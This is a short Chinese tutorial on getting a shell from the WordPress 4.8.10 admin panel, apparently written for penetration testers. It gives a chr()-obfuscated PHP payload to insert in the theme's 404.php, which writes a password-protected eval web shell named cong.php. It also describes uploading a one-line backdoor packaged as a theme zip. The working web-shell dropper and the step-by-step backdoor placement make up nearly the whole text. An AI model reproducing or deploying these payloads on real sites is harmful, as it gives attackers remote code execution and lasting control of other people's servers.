本次示例WordPress版本号为 4.8.10
理论上小于4.8.10版本也可以使用该方法后台getshell

1. 后台编辑404页面Getshell

   "主题"-“编辑”-“404.php”

<script language="php">fputs(fopen(chr(46).chr(47).chr(99).chr(111).chr(110).chr(103).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(112).chr(97).chr(115).chr(115).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));</script>

插到文件头
404默认模板路径是：wp-content/themes/twentyten/404.php
其中"twentyten"目录是默认模板目录。
更新完直接访问 localhost/wp-content/themes/twentyten/404.php 就会在twentyten目录生成一句话后门文件cong.php 密码pass，插入的代码是Chr加密，可自行编辑。（仔细看代码，文件名与一句话代码用" ,w "隔开了）

2. 上传本地主题Getshell

   本机建立目录“test”,可以直接把一句话放到index.php文件，再新建一个style.css样式文件（版本不同，上传时会判断是否存在"index.php"文件和"style.css"样式文件。)

   打包test目录为zip文件。WP后台的主题管理，上传主题，安装。则你的后门路径为：
   localhost/wp-content/themes/test/index.php

参考：https://blog.csdn.net/asli33/article/details/6316323
1.原文中的Chr加密后的代码有问题，重新弄了。